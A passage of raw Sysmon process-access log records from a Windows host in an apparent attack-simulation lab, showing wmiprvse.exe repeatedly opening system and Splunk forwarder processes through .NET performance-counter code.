13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005362Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005361Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005360Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E000-000000009101}3324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005359Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005358Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-DF00-000000009101}3196C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005357Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005356Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005355Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005354Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005353Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005352Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005351Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005350Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005349Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005348Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005347Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005346Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005345Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005344Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005343Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005342Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005341Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005340Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005339Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 